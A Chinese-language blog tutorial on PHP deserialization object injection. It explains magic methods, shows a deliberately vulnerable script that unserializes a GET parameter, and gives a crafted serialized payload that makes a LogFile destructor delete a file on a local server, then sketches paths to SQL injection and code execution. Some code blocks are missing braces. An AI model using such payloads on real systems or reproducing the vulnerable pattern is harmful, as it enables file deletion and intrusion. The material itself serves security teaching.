php反序列化注入,php关于反序列化对象注入漏洞

客官°小女子只卖身不卖艺 2022-11-12 09:53 240阅读 0赞

php对象注入是一个非常常见的漏洞，这个类型的漏洞虽然有些难以利用，但仍旧非常危险。本文主要和大家分享php关于反序列化对象注入漏洞详解，希望能帮助到大家。

分析

php基础

serialize 把一个对象转成字符串形式， 可以用于保存

unserialize 把serialize序列化后的字符串变成一个对象

php类可能会包含一些特殊的函数叫magic函数，magic函数命名是以符号\_\_开头的，

比如 \_\_construct, \_\_destruct, \_\_toString, \_\_sleep, \_\_wakeup等等。

这些函数在某些情况下会自动调用，比如

\_\_construct当一个对象创建时被调用，

\_\_destruct当一个对象销毁时被调用，

\_\_toString当一个对象被当作一个字符串使用。

举例说明

举个例子：<?php

class TestClass

public $variable = 'This is a string';

public function PrintVariable()

echo $this->variable . '  
';

public function \_\_construct()

echo '\_\_construct  
';

public function \_\_destruct()

echo '\_\_destruct  
';

public function \_\_toString()

return '\_\_toString  
';

$object = new TestClass();

$object->PrintVariable();

echo $object;

![b34df0adf0681e92789c2ff0888004b8.png][]

php允许保存一个对象方便以后重用，这个过程被称为序列化。

为什么要有序列化这种机制呢?

在传递变量的过程中，有可能遇到变量值要跨脚本文件传递的过程。试想，如果为一个脚本中想要调用之前一个脚本的变量，但是前一个脚本已经执行完毕，所有的变量和内容释放掉了，我们要如何操作呢?难道要前一个脚本不断的循环，等待后面脚本调用?这肯定是不现实的。

serialize和unserialize就是用来解决这一问题的。serialize可以将变量转换为字符串并且在转换中可以保存当前变量的值；unserialize则可以将serialize生成的字符串变换回变量。这样在跨脚本传输和执行就完美解决了。

magic函数\_\_construct和\_\_destruct会在对象创建或者销毁时自动调用；

\_\_sleep magic方法在一个对象被序列化的时候调用；

\_\_wakeup magic方法在一个对象被反序列化的时候调用。<?phpclass User \{

public $age = 0;

public $name = '';

public function Printx()

echo $this->name.' is '.$this->age.' years old.  
';

\} public function \_\_construct()

echo '\_\_construct  
';

public function \_\_destruct()

echo '\_\_destruct  
';

public function \_\_wakeup()

echo '\_\_wakeup  
';

public function \_\_sleep()

echo '\_\_sleep  
';

return array('name', 'age');

\}$usr = new User();

$usr->age = 20;

$usr->name = 'John';

$usr->Printx();

echo serialize($usr);echo '  
';

$str = 'O:4:"User":2:\{s:3:"age";i:20;s:4:"name";s:4:"John";\}';

$user2 = unserialize($str);$user2->Printx();?>

![b1c65d487ef1873b57bf799e9960656d.png][]

现在我们了解序列化是如何工作的，但是我们如何利用它呢?

有多种可能的方法，取决于应用程序、可用的类和magic函数。

记住，序列化对象包含攻击者控制的对象值。

你可能在Web应用程序源代码中找到一个定义\_\_wakeup或\_\_destruct的类，这些函数会影响Web应用程序。

例如，我们可能会找到一个临时将日志存储到文件中的类。当销毁时对象可能不再需要日志文件并将其删除。把下面这段代码保存为log.php。<?php //log.php class LogFile \{

// log文件名

public $filename = 'error.log';

// 储存日志文件

public function LogData($text)

echo 'Log some data: ' . $text . '  
';

file\_put\_contents($this->filename, $text, FILE\_APPEND);

// 删除日志文件

public function \_\_destruct()

echo '\_\_destruct deletes "' . $this->filename . '" file.  
';

unlink(dirname(\_\_FILE\_\_) . '/' . $this->filename);

test.php 假设这是给用户的php。<?php

//test.php

include 'logfile.php';

// ... 一些使用LogFile类的代码...

// 简单的类定义

class User

// 类数据

public $age = 0;

public $name = '';

// 输出数据

public function PrintData()

echo 'User ' . $this->name . ' is ' . $this->age . ' years old.  
';

// 重建用户输入的数据

$usr = unserialize($\_GET\['usr\_serialized'\]);

123.php<?php

//123.php

include 'logfile.php';

$obj = new LogFile();

$obj->filename = '1.php';

echo serialize($obj) . '  
';

开始有一个1.php:

![e3b3bfe67cdfc67186f0a5011868ac7e.png][]

现在用户传入一个序列化字符串，test.php将其反序列化,http://127.0.0.1/test.php?usr\_serialized=

O:7:%22LogFile%22:1:\{s:8:%22filename%22;s:5:%221.php%22;\}

结果，解析出来的对象，在释放过程中，调用了log.php的\_\_destruct()函数，把文件1.php给删除了。

![d99671175cbe694395704babfaff9b68.png][]

![403137b5009bb53bd9542334e48f2c5c.png][]

利用总结

在变量可控并且进行了unserialize操作的地方注入序列化对象，实现代码执行或者其它坑爹的行为。

先不谈 \_\_wakeup 和 \_\_destruct，还有一些很常见的注入点允许你利用这个类型的漏洞，一切都是取决于程序逻辑。

举个例子，某用户类定义了一个\_\_toString为了让应用程序能够将类作为一个字符串输出(echo $obj)，而且其他类也可能定义了一个类允许\_\_toString读取某个文件。

也可以使用其他magic函数：

如果对象将调用一个不存在的函数\_\_call将被调用；

如果对象试图访问不存在的类变量\_\_get和\_\_set将被调用。

但是利用这种漏洞并不局限于magic函数，在普通的函数上也可以采取相同的思路。

例如User类可能定义一个get方法来查找和打印一些用户数据，但是其他类可能定义一个从数据库获取数据的get方法，这从而会导致SQL注入漏洞。

set或write方法会将数据写入任意文件，可以利用它获得远程代码执行。

唯一的技术问题是注入点可用的类，但是一些框架或脚本具有自动加载的功能。最大的问题在于人：理解应用程序以能够利用这种类型的漏洞，因为它可能需要大量的时间来阅读和理解代码。

php反序列化注入,php关于反序列化对象注入漏洞

发表评论取消回复

还没有评论，来说两句吧...

相关阅读

相关反引号注入_细说php反序列化字符逃逸

相关 PHP反序列化专题

相关 php反序列化漏洞

相关 php反序列化漏洞

相关 php反序列化注入,php关于反序列化对象注入漏洞

相关 php 序列化与反序列化

相关 PHP反序列化入门之session反序列化

相关序列化对象与反序列化

相关 PHP的序列化和反序列化

相关 php 反序列化漏洞简介